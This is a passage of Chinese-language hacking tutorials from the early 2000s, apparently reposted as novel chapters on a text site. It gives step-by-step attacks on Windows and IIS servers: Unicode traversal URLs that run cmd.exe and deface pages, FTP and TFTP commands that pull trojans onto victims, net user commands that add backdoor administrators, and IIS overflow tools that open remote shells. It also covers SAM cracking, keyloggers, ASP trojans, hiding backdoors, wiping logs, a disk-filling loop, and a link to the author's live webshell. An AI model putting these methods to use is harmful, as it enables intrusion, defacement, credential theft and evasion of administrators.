  11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
  2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,
  那就应该用改好的主页上传,这个我们后面介绍。
  几点忠告:
  1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
  2,echo前记得帮他们做好备份
  3,不准在主页里加入恶性语句
  2,下载文件
  要是有什么有用的文件被你发现,那我们如何下载呢?
  最简单的方法:把文件copy至网页目录下。copyc:\email\baby.emlc:\inetpub\wwwroot\baby.zip,然后,
  下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。
  别的方法:对不起,没想好:)
  3,最重要的上传
  一般方法:ftp法
  首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
  echo+openftp.cshu.com(ftp主机)>c:\hehe.haha
  echo+useryourname>>cc:\hehe.haha(yourname是用户名)
  echo+yourpasswd>>c:\hehe.haha(yourpasswd是密码)
  echo+getsetup.exe>>c:\hehe.haha要下载的文件
  echo+quit>>c:\hehe.haha
  完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe
  就会出现在当前目录了(也就是cmd所在目录)
  别忘了先上传到ftp主机,不要做马大哈哦!
  最简单的方法:tftp法。
  这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,
  利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
  在这里我推荐ciscotftpserver,自己去找找把,实在没有来找我:)
  安装好后运行,别忘了设置好默认目录,否则会找不到文件tftp命令:tftp-i1.2.3.4GETihateu.exec:\winnt\ihateu.exe(ihateu.exe在默认目录里)
  1.2.3.4为你的ip,用unicode运行一下,会看到tftpserver里有反应了,这就好了,不一会,文件就传上去了,方便把!
  学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
  4,如何清除痕迹
  虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
  C:\winnt\system32\logfiles\*.*
  C:\winnt\ssytem32\config\*.evt
  C:\winnt\system32\dtclog\*.*
  C:\winnt\system32\*.log
  C:\winnt\system32\*.txt
  C:\winnt\*.txt
  C:\winnt\*.log
  全……擦掉!
  四,细节问题。
  1,遇到长文件名怎么办?
  c:\programfiles
  就用c:\"program20%files"
  2,遇到空格怎么办?
  20%代替喽,或者xxyy=xxyy~1
  3,如何做个很大的文件?
  目的就是破坏啦!我不喜欢不过教教你们啦
  @echooff
  echobig>c:\a.a
  :h
  copyc:\a.a+c:\a.ac:\a.a
  gotoh
  注意不要乱来啊!
  4,输入命令,没反应或反应不对。
  :)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!
  看在你看到这里那么给我面子的份上,在给你几个吧!
  http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\或http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\或http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
  不一定有用哦!
  5,如何找到unicode漏洞的主机
  呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
  不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
  6,我copy,del文件,怎么显示aceessdenined?
  这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!
  这个我会在今后介绍,现在你可以试试attrib
  attrib-r-h-sc:\autoexec.bat
  再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!
  7,我黑了主页,天下无敌?
  我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!
  对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!
  要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择
  8,我如何做更多的事?
  第一,努力提高权限
  第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!
  -----------------------------------------
u滺书擝 uUtXt.coM 铨纹吇扳粤镀


第三卷 第一十三章 字数:6547
  ?如果你已经夺取了一定的权限,比如,可写的!那么运用下面两个软件,可以轻易的帮你入
  侵:DNTUCli.exeDNTUS26.exe
  在命令提示下运行:
  D:\>DNTUCli.exe
  Usage:DNTUCli.exe
  DNTUCli.exefile://MachineName/(remoteserverisfile://MachineName/)
  DNTUCli.exe\\.(localserver)
  Copyright(C)1991-2001DameWareDevelopmenthttp://www.dameware.com/
  当你输入ip的时候会让你输入用户和密码!只要对方开了ipc而且你的用户有可写的权限的
  话!!就会复制同一目录下的DNTUS26.exe,这种程序是自己安装而且自己打开服务的!
  然后你就可以直接连接到对方的c了!这种软件有CMD重定向功能···然后你就随便想
  做你的任何事情了!
  C:\>netuser
  \\FYNET33的用户帐户
  ----------------------------------
  AdministratorGuest
  命令成功完成。
  C:\>netuserguest/active:yes
  命令成功完成。
  C:\>netuserguestwry
  命令成功完成。
  C:\>netuserlocalgroupadministratorsguest/add
  命令成功完成。
  这个时候你的guest已经是管理员了!!如果你禁止了net.exe或者被删除了你可以用ftp
  命令下一个net.exe或者另外一个软件adduser.exe
  用法:
  D:\>addusers.exe
  ADDUSERS{/c|/d{:u}|/e}filename[/t][/s:x][/?][\\computername|domainname]
  [/p:{l|c|e|d}]
  Error:toofewarguments
  现在你就是管理员了!要是感觉还不是很爽!呵呵!那么努力进它的内部网络吧!!看:
  一,进入第一台假设平台的nt服务器通过简单的扫描器,只需带有简单密码验证的哪些就已足
  够扫出那些防范教差的机器。通常的用户名不是空就是相同。绑定netbeui协议的nt平台有个
  致命的弱点允许攻击者得到本地用户名列表及采用暴力法不断验证他们的密码。然后,就是
  因为网管在意识上的不重视,攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的
  或密码为空的服务器。
  二,攻击者控制服务器文件系统
  有了密码对入侵者来说,绝对不是他们的最终目的!隐射为本地盘,当入侵者得到你adminitra
  tor组的任何一个成员的密码,或者是个普通用户的密码这里我把具体命令cut了!
  1,是administrator的成员时几乎可以隐射你任意一个盘。
  2,普通用户将利用各种可能的机会得到更多的信息或直接利用webhole来获取更大的权限。
  典型的手法有:利用webasp的功能!控制你整个硬盘(注意iis的一些已知的漏洞upload.
  asp)。
  注意:利用asp功能,攻击者同样能控制你硬盘上的大多数的文件(everyone的文件)
  三,起动任何他们想要立即运行的程序
  一般来说立即启动对nt来说是比较困难的,虽然有些入侵者会写几句命令,然后等待服务器
  重新启动时,他的程序也将得以运行,但是我想对于大多数的攻击者来说,他们不会有那么
  好的耐心他们会立即启动他们的东西(可能是些后门木马)。
  在ntiis的web配置里有个选项是执行--------危险攻击者将利用他控制你文件系统的
  任何一种方法把他要启动的程序放到那些允许执行的目录里去然后他们将
  http://www.xxx.com/cgi-bin/xxx.exe
  利用web启动该文件。
  指出:iis默认的一些目录带有可执行的权利/script/tools/....
  对于一些初级入侵者来说,他们往往启动的是些后门木马,然后对于那些经验丰富的入
  侵者他可能对控制你一台机器已经显得毫无兴趣,他们可能真正的目的是控制你的整个
  网段,这里值得注意的是,这些入侵者将会启动一个等同于telnetshellfornt的
  东西netcatncx99.exe将在nt的99段口开启一个telnet服务端进程,等代攻击者的
  登陆
  四,登陆取得最高权限
  登陆后的入侵者在远端服务器并不具有最高的权限,他们将采用一些nt本地溢出变成admin
  其中著名的程序是getadmin.exe
  五,删除日志记录
  任何一个入侵者都懂得保护他们自己!所以删除日志记录对他们来说是件很重要的事在这里
  我建议网管采用第二硬备份或采用第三方日志记录系统。
  由于nt的日志文件是当前进程运行操作的文件,他是根据时间来不断换新的操作文件的任何
  人,包括admin在内是无权删除或更改的。
  而这里有个简单的不能在简单的原理,入侵者在取得admin权限后通过更改系统时间!让日
  志记录进程转而记录另一个文件,然后更改他想更改的那个日志文件。
  六,进入你的内部网
  由于攻击者登陆你的shell,此时的他所具有的ip等同于你这台机器上的内部地址
  ftp198.162.1.2
  telnet127.0.0.3
  netview
  netuse*\\
  都将在他们的手里变成入侵你内部网的工具,通过影射,然后在cdz:
  同时上述的攻击手段将再一次在内部网重演,扫描,破解,登陆。内部网络的速度将比远程
  快很多,这无意给入侵者暴力破解打开了方便之门。
  七,更多手段
  可能话!他们会做一切你想不到的事!监听,ip欺骗。。。。。
  但是,嗅探的方法是不可能在交换机的网络里抓到信息的!即使在内部网络里,我们的
  目标就是
  拿到对方的密码才可以有访问的权限!
  如果你侥幸的有权限加到了域管理员!那么以上的都不要了!
  我在把2000和nt下的后门拿出来说一下子:如何做个好后门是很关键的;
  1》推荐为小榕的RemoteNC,RemoteNCBeta4远程安装于NT/2000,提供CMD重定向功
  能因为它具有cmd的重定向,也就是调用了对方的cmd,所以可以穿过放火墙后面的主机,传
  递信息但是必须要是administrator的身份安装唯一的不好的,现在这个软件已经被列入了
  病毒的行列了!我压缩了后,又被最新的kv3000杀死了!
  2》现在推荐为蓝色火焰,目前还没有被查杀了,支持ftp,telnet等多种方式!
  既然你已经获得了管理员权限了!那么复制到对方的admin4\system32改一个隐蔽的名字!!
  然后用at命令或者直接用RemoteNC启动!,这个软件后门唯一不好处没有和exe关联!很容
  易被删除的!
  3》推荐为asp木马。这种木马永远不会被查杀!上传到对方主机有可执行的asp的目录下!
  直接可以在浏览器上直接运行的!
  比如:
  http://www.fibrlink.com/flink/apply/cmdasp.asp这个站点,我做的asp木马,到我写
  的时候,还是可以用的!希望大家只是用来测试!
  4》推荐为tini.exe这个后门软件,据说是永远不会被查杀的软件,因为它用的是window的
  shell通道!!呵呵!但是,我在测试的时候还是会被最新的锘盾杀死的!复制到对方主机
  上,运行后就可以telnet对方的7777断口了!
  如何把自己的后门程序隐藏的比较好?
  1。取比较和系统文件的名字,比如:asp.exe管理员在删除的时候就的考虑了!
  2。用attrib隐藏文件了。但是这样只是表面的隐藏!
  3。运用一些活门的程序,比如:Explorer.exe一般的这个程序都是在键值shell下的!
  每次都会运行的!那么每次你的后门程序都会启动!
  4。隐藏在数据流里!(稍后介绍)
  后门做好了,不要万事大吉了!还要删除了自己的记录!
  Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、smtp服务器日志,DNS
  服务器日志、FTP日志、WWW日志等等可能会根据服务器所开启的服务不同而有所不同。还有
  一些网络管理软件的日志,说到这里,记得新浪的网管软件是自己开发的,如果不了解这个,
  可能会留下更多的记录!!!
  1)Scheduler日志
  Scheduler服务日志默认位置:2000下:%systemroot%\schedlgu.txtNTworkstation
  下为
  SchedLog.txt
  可以打开schedlgu.txt
  Schedluler服务日志在注册表中
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
  先停掉他netstop"taskscheduler"(注意不停是删不掉的)
  然后再delschedlgu.txt或schedlog.txt之后就OK了.
  delsched*.txt
  不过你如果不想删他,也可以改改它.他的内容是这样的:""任务计划程序服务"
  已退出于01-5-2220:37:34
  "任务计划程序服务"
  已启动于01-5-257:07:37
  "任务计划程序服务"
  已启动于01-5-257:26:36
  "任务计划程序服务"
  已退出于01-5-258:47:54"
  很好改的.
  (2)FTP日志
  Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1,默认每天一个日志.格式是这样的ex*.log.注意这是一台NT4的LOGFILES下的文件:
  这台服务器下管理有多个HTTP或FTP站点
  c:\winnt\system32\logfiles的目录
  00-12-0406:28p.
  00-12-0406:28p..
  01-05-1812:56pMSFTPSVC1
  01-04-2311:28aMSFTPSVC2
  01-01-1211:56aMSFTPSVC3
  01-06-0108:12aSMTPSVC1
  01-09-2008:55aW3SVC1
  01-08-0210:36aW3SVC10
  01-10-1104:48pW3SVC11
  01-07-1109:16aW3SVC2
  01-10-1110:31aW3SVC3
  01-10-1004:55pW3SVC4
  01-09-2801:43pW3SVC5
  01-10-1108:44aW3SVC6
  01-10-1108:00aW3SVC7
  01-09-3001:49pW3SVC8
  01-10-1108:03aW3SVC9
  看看日志文件的格式:
  c:\winnt\system32\logfiles\msftpsvc1\in010306.log
  192.168.5.8,anonymous,01-3-6,16:41:51,MSFTPSVC1,APPSERVER,192.168.5.8,
  0,0,0,331,0,[3]USER,anonymous,-,192.168.5.8,-,01-3-6,16:41:51,
  MSFTPSVC1,APPSERVER,192.168.5.8,0,0,0,530,1326,[3]PASS,IE30User@,-,
  法一:>这个时侯netstopmsftpsvc停掉后台服务.
  然后尽管del............看这删吧,不要删的过火,把当天的删了就行.别忘了再NET
  START
  MSFTPSVC把服务打开.
  法二:>当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,
  别忘了把时间改回来哦实际上在得到ADMIN权限后,做这些事很容易.
  法三最傻瓜的清FTP日志的方法,cleaniislog!!
悠憂书萌 UUTXT.coM 全纹自板月读


第三卷 第一十四章 字数:7988
  ?几种入侵方法
  一iis.printer溢出攻击
  据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!
  具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此……溢出攻击是非常强大的!
  由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。
  具体方法:
  1,准备iishack,该版本可以对多种系统进行攻击。
  2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。
  3,在命令行方式执行iis5hack(主机ip)(端口号,默认80)(系统代号,具体可参考程序的说明)(shell口)
  例如:iis5hack11.11.22.22801111(以为在111端口开一个shell)
  4,用nc或telnet连上,nc/telnet11.11.22.22111,成功的话就可以控制机器了,加个用户,做个代理……
  我的看法:
  这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。
  二idq/ida漏洞溢出攻击
  这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是snake的gui版本,很方便的。
  具体方法:
  1,准备snakeiis溢出程序。可以从本站下载。
  2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。
  3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。
  4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)
  5,欢呼吧!再次溢出,别忘了改shellcode为你想要的代码哦。
  6,重复4,很快一台新鲜的win2k被你控制了!
  我的看法:
  我很喜欢用这种攻击,因为win2k的3389可以很方便的为我做事,省力地搞到一台win2k,然后慢慢享用,爽到根尖细胞啊!大家应该掌握这项方法。
  三*bsdtelnetd溢出攻击
  又是溢出,不过这个可是真正的热点哦,
  具体方法:
  1,使用fbsdhackforwin2k来攻击,本站有下载的
  2,还是要找到这样的主机,一般是xnix的,比较少的,用专门的扫描器吧,我会在不久放出来。
  3,等吧!这个漏洞要发送的信息很大,大约16mb,可怕吧,所以最好用高速肉鸡
  4,有幸成功了,记得请我吃饭!
  我的看法:
  这个漏洞的利用比较有难度,从找机器开始就是。但作为黑客爱好者,我们没有理由去回避它!
  五,密码暴力破解
  这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。
  具体方法:
  1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。
  2,找到一台相应的主机。
  3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来!
  4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧^_^
  --------------------------------
  大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。
  这是菜鸟操的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的狗屎运?算了算了,我不合那种欺世盗名之辈一般见识,开始做操吧!
  不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。
  在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。
  首先说说最简单的:systemtoadmin
  当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令:
  netuser察看用户表netuserusernamepass/add(添加密码为pass的用户username)
  netlocalgroup察看组netlocalgroupguestscshu/add把cshu用户加入guests组
  netuse\\ip\ipc$"password"/user:username这是远程连接的命令
  假如我们溢出了11.11.22.22,那么这样做吧!
  netuser(看到了iusr_machinename的用户了,它一般没什么权限的)
  netuseriusr_machinenamecshu(把它的密码设为cshu)
  netlocalgroupadministratorsiusr_machinename/add(加入administrators组)
  这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!
  熟悉一下netuse命令:
  netuse\\11.11.22.22\ipc$"cshu"/user:iusr_machinename建立连接
  copyc:\haha.exe\\11.11.22.22\admin$把haha.exe复制到机器c:\winnt\system32上,若是c$.d$,就表示c,d盘
  nettime\\11.11.22.22看到了时间了,比如是8点
  at\\11.11.22.228:03haha.exe就会在8点3分执行。
  netuse\\11.11.22.22/delete断开连接
  应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:)
  是不是很简单?所以我是溢出是很厉害的攻击方法。
  3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)
  总的来说,还是unicode的机器最多,为什么白痴网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。
  首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。
  1,如果我们可以对winnt\repair和winnt\config进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp把get改成put下载下来,或者把它复制到inetpub\wwwroot下,改成zip下载。
  拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。
  2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!
  3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)
  4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!
  5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documentsandsettings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.
  6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。
  总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)
  想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。
  那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!
  ----------------------------------------
  这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。
  今天说点什么呢?没有主题,乱谈一通吧!
  首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。
  我来说说我自己觉得最有用的几个项目:
  1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。
  remoteexecute-x这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)
  remoteftppcawfilemethod-x这是远程获取pcanywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!
  remoteftpsam-x拿sam的,还是用最好的lc3来解吧!
  frontpageextended这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilegehole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点,http://ip就可以了!(http://不要忘)
  此外还有一点变通,大家肯定读的懂的。
  2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。
  3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!
  总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的。
  然后我想说说一些黑站的经验。
  ☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。
  上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!
  推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)
  最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)
  ☆我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poisonbox,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!
  我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?
  ☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:
  netstarttermservice启动win2k的终端控制
  netstartworkstation打开netuse功能
  netstartlanmanserver打开ipc
  netstarteventlog启动日志(你不会那么傻吧!stop)
  netstartschedule打开计划(at)
  netstartserver共享
  还有很多,net命令里去找吧!
  ☆打开telnet
  1,远程去运行ntlm.exe,流光里有
  2,netstoptelnet
  3,netstarttelnet
  ☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!
  至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!
  ☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。
  具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。
  做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!
  要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc.126.com国内最最好的的代理站点,怕死的朋友千万不要错过。
  最后说说一些对于菜鸟同志的建议:
  不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的……
  不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。
  不要和被你黑的网管过多接触,前车之鉴哦。
  对于一台好机器要做好后门,不要轻易失去它
u憂书萌 uuTXT.cOM 铨纹子版粤牍


第三卷 第一十五章 字数:6284
  ?几个简单的扫描跟入侵(菜鸟入门)
  很多人都说自己不知道该从哪里学起。如果你是刚刚起步,不要老想着一步登天,也不要以为入
  侵就是最高境界!不要以为你靠着一些黑客软件、靠着一些漏洞资料,靠着别人所教的傻瓜式地去做,
  去入侵了,你就是高手,那样,到头来你会发现自己一无所获。也可能很多人只知如何攻击,却不知道
  自己如何防护。比如你按着某些黑客教程成功地利用了一个CGI漏洞,入侵成功,可是你知道为什么会成
  为CGI的漏洞吗?你会根据一个CGI的工作状态来判断他可能有哪些漏洞或那方面的漏洞吗?一系列的问
  题就是得有一系列的基础知识。
  这是一编简单的通过IPC的入侵!由于这几天有几个朋友跟网友要求帮忙入侵一些主机。
  由于没事作跟着很久没有练习一下学到的所谓黑客知识。就答应了。。
  昨天,开始动手的头一天,开始还不知道所作什么好!由于本人的编程能力是八窍通七窍。
  就是一窍不通,所以就只有依赖工具的帮忙了。首先介绍一种大家熟悉的流光4.7。这个可以从
  小榕的网站那里下载:http://www.netxeyes.org/main.html
  安装完开始动手。但我还要介绍另外几工具因为都有用过各有各的好处。
  X-Scan-v2.2-cn
  采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行
  两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,SNMP信息,
  CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,
  NT服务器NETBIOS信息、注册表信息等。
  此软件可以从各黑客网站上找到。例如http://www.heibai.net
  国产X-Way2.5版本高级扫描器
  本人最喜欢的扫描器来的。功能就不介绍了,反正很好!http://www.heibai.net下载。
  还有一个最适合菜鸟学习的工具:终端服务客户端大家对这个应该很熟悉吧。利用3389。
  好了。其它的话就不多说了,开始进入主题了:
  首先拿起了朋友要求入侵的主机IP。有这里就用202.XXX.XXX.XXX来代替。
  打开流光4.7。在文件那里打开高级扫描向导或按Ctrl+w。打开之后开始设置--在起始地址那里打入要扫描的
  IP。202.XXX.XXX.XXX。结束地址一样。那些为默认,下一步,端口扫描---标准端口。下一步到最后的选择字典。
  本人流光自带的字典。最好是自己下载一个字典生成器。选择完之后在线程数那里选择所要的线程。由网速而定了。
  本人用100个线程。按完成开始扫描。下去就只有看看运气了。。
  等了一下,
  扫描结果出来了
  端口扫描
  80(HTTP)
  21(FTPControl)
  53(BIND)
  443(HTTPS)
  1433(MSSQL)
  3389(TERMINAL)
  139(SMB)发现弱口令
  515(LPD)(RedHat7.0LPD存在远程溢出)
  IPC扫描
  获得用户列表
  Administrator(Admin)GuestILS_ANONYMOUS_USERIUSR_HUAIWAM_HUANetShowServices(Admin)TsInternetUser
  猜解成功用户帐号Administrator(Admin):(admin123)
  CGI扫描
  WEB版本信息:Microsoft-IIS/5.0
  扫描成功CGI漏洞
  /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\(HTTP:200)
  /scripts/samples/search/simple.idq(HTTP:200)
  /scripts/samples/search/queryhit.idq(HTTP:200)
  /scripts/samples/search/query.idq(HTTP:200)
  /scripts/samples/search/qsumrhit.htw(HTTP:200)
  /scripts/samples/search/qfullhit.htw(HTTP:200)
  /scripts/samples/search/filetime.idq(HTTP:200)
  /scripts/samples/search/filesize.idq(HTTP:200)
  /scripts/samples/search/author.idq(HTTP:200)
  这么多啊。。哈哈。。。。。没想到这个主机的安全性这么差。哈。看来今天的运气不错。
  看一下。
  80http
  21FTP
  53没用过。。
  1443可以破解
  3389呵呵~~可以用来作肉鸡
  139IPC我最喜欢跟最熟的。。
  515不错
  由于今天我们要讲的是简单的入门,所以只采用139,跟3389。
  首先拿出准备好的终端服务客户端,打入IP按连接。。。。。
  几秒钟后,屏幕上显示出WIN2000登录界面,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,
  请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果
  发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),如果有的话,打开“帮助”一栏中“操作指南”,
  在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们
  填入的路径的空白栏。在这里假如该系统安装在C盘上,就在空白栏中填入“c:\winnt\system32”。然后按“确定”,
  于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。现在我们要获得添加一个账号,成为系统的合法用户。
